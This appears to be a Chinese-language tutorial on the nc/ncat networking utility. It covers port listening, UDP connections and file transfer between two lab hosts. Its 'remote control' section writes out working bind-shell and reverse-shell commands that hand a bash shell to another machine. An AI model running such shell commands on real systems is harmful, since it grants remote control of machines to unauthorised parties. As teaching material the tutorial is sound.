nc介紹
ncat/nc 既是一個埠掃描工具,也是一款安全工具,還能是一款監測工具,甚至可以做為一個簡單的 TCP 代理。
在大多數 Debian 發行版中,nc 是預設可用的,它會在安裝系統的過程中自動被安裝。 但是在 CentOS 7 / RHEL 7 的最小化安裝中,nc 並不會預設被安裝。 需要用下列命令手工安裝。
yum install nmap-ncat -y監聽埠
使用-l選指定監聽埠,加上-v選項顯示詳細資訊
[root@host_1 ~]# nc -lv 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234連線埠
nc預設就是連線埠,-v顯示詳細資訊,-u連線udp埠
[root@host_2 ~]# nc -v 192.168.159.134 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.159.134:1234.檢視系統開啟的udp埠
[root@host_1 ~]# netstat -unlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:3139 0.0.0.0:* 691/dhclient
udp 0 0 127.0.0.1:323 0.0.0.0:* 640/chronyd
udp 0 0 0.0.0.0:68 0.0.0.0:* 691/dhclient
udp6 0 0 :::45845 :::* 691/dhclient
udp6 0 0 ::1:323 :::* 640/chronyd 連線udp埠
[root@host_2 ~]# nc -vu 192.168.159.134 3139
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.159.134:3139.傳輸檔案
在埠已連線的基礎上,可以進行檔案傳輸。
- 主機1作為接受端開啟埠
[root@host_1 testdir]# nc -lv 1234 > receive.txt主機2上連線埠並傳輸檔案
[root@host_2 ~]# nc -v 192.168.159.134 1234 < anaconda-ks.cfg Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.134:1234. Ncat: 1238 bytes sent, 0 bytes received in 0.03 seconds.
遠端控制
現有host_1host_2兩臺主機,演示host_2控制Host_1
host_1 192.168.159.134
host_2 192.168.159.130- 正向控制
host_1執行:
[root@host_1 testdir]# nc -l 1234 -c bashhost_2執行:
[root@host_2 ~]# nc -v 192.168.159.134 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.159.134:1234.
hostname
host_1nc命令通過建立的連線將bash傳遞給對方。上面host_2連線成功後,執行hostname命令返回host_1主機名,表示已成功控制host_1
由於正向控制是在被控端開啟埠,所以若存在防火牆很有可能無法連線成功
- 反向連線
主機host_2監聽埠
[root@host_2 ~]# nc -l 1234
主機host_1連線埠並推送bash
[root@host_1 testdir]# nc -v 192.168.159.130 1234 -e $(which bash) Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.130:1234.
控制端主機開啟埠監聽,被控端主動連線埠並推送bash到控制端。
nc傳輸加密
由於nc使用明文進行傳輸資料,所以引入ncat命令。ncat命令使用--ssl選項表示開啟ssl管道加密傳輸。